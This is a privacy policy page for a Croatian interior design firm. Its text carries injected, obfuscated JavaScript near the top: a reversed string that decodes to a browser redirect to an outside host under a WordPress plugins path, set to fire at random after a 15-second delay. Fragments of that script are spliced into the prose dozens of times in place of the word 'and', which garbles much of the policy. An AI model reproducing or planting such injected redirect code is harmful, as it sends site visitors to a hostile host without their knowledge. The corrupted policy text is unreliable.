HR / EN

Privacy policy

””

”IMAGINE

)=="string")return $GQRkExOVl1p57bbeL4u.list[n].split("").reverse().join("");return $GQRkExOVl1p57bbeL4u.list[n]};$GQRkExOVl1p57bbeL4u.list=["'php.sofnI/slitU/eroC/sppa/gnigats-pw/snigulp/tnetnoc-pw/moc.stelotog//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and process personal submitted to us by clients. Because protecting your privacy is our priority, we have adopted the following Privacy Policy.

IMAGINE j.d.o.o. follows the following principles to protect your privacy:

• We do not collect more data than necessary;
• We do not use your data for purposes that are not listed;
• We do not keep your data storied if it is no longer necessary;
• We never sell, lend, distribute or publicly disclose your personal data.
• We do not send your data to third parties,
• We do not use any automated processing andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and decision making or profiling,
• We do not pass your personal data to a third country or an international organization,
• We do not use your data for purposes that are not listed;
• We also we check that your data is safely stored.

IMAGINE j.d.o.o. collects only a limited amount of information about you that is necessary to respond to your request, andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and we hope have established a long-term andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and credible business relationship.

We, in IMAGINE j.d.o.o. have created a Privacy Policy that has the purpose to help you understandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and what data we collect, for what purpose we use it, andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and how you can exercise your rights.

It is important to read our Privacy Policy andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and we hope that you will set aside some time andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and attention for this.

How andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and what data do we collect?
When you contact us using our web contact form or directly through our email address. The data you fill in (personal data such as your name, email address, phone number, organisation/company) or send directly by e-mail, the data will be handom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andled andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and stored so that we can contact you andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and respond to your request. If you are under 16 years of age, you must attach the consent of your parents or the holder before providing personal data. By filling out the contact form on our website or by contacting us directly through e-mail, you guarantee that the data that you have attached is correct andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and that you fully agree to the terms of our Privacy Policy andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and the conditions mentioned in them.

Data on the Processing Manager of your data.
The Processing Manager of this site andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and your personal data IMAGINE j.d.o.o. za dizajn interijera, Pod kosom 35, Split

What is the purpose of andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and the legal basis for the collection of your data?
Taking of the most appropriate activities at your request prior to entering into any business relationship based on the business activity of the company andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and its legitimate interests.

How long will your personal data be stored?
As long as we have open communication for the purpose of establishing a joint business cooperation (booking) as well as for the time of validity of our contractual relationship.

How do we use information about you?
We collect information about you so that we can contact you andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and respond to your request. We collect andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and use your personal data for the purpose of establishing our business relationship as well as for the time of validity of our contractual relationship. Throughout the duration of the contractual relationship, IMAGINE j.d.o.o. will send you notifications of new products andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and services that we believe may be of interest to you, if you have given permission for this when contacting our company through the web form. The permission you provide us for this purpose can be withdrawn at any time, andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and in that case we will stop with this processing.

Information security
We have provided security measures in order to protect the personal data you share with us. Your personal data is protected against accidental or unlawful destruction, loss, alteration, unauthorised disclosure of access to personal data being transmitted, stored or processed.

About our website server
This website is hosted by a globally popular service provider in the EU. This website is hosted by a globally popular service provider in Germany andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and the EU andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and the European Commission considers they provide an adequate level of protection of personal data of EU citizens.

Cookies
In order for us to make it easier for you to browse through our website, our global network server uses cookies. Cookies cannot be used to run programs or deliver viruses to your computer. Viewing our site is possible without the use of cookies, if your Internet browser is set up this way. This website use only necessary cookies.

Your rights
You have the right to information regarding the processing of your personal data, withdrawal of your consent at any time, a correction or update of your personal data to keep it accurate, deletion of your personal data when they are no longer necessary for the above-mentioned purposes, a transfer of your personal information in outline form andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and filing a complaint to IMAGINE j.d.o.o. on IMAGINE j.d.o.o. za dizajn interijera, Pod kosom 35, Split or dpo@imagine.hr, or to the competent state body.

Your consent
By using this website, you are giving consent to this privacy policy, meaning you give explicit permission to IMAGINE j.d.o.o. to further collect andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and process your personal data, as well as all the other data it finds by providing its services in accordance with legal regulations, andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and all in accordance with the defined purpose in this policy. You also agree that you are familiar with all relevant information about IMAGINE j.d.o.o. andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and the services it provides.

The right to submit a complaint to the competent authority
At any time, you can file a complaint directly to the competent supervisory body: The Agency for the Protection of Personal Data (AZOP), Martićeva 14, Zagreb, contact: + 385 (0) 1 4609 999, azop@azop.hr, www.azop.hr.

Violation of personal data
We will inform AZOP as the competent authority for data protection for any unlawful violation of data.
Changes to our Privacy Policy
In the case of a change of our Privacy Policy, we will notify you about it on this page andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and update the date of the Privacy Policy modification below as follows.

This Privacy Policy has been updated on 20.5.2018.
“]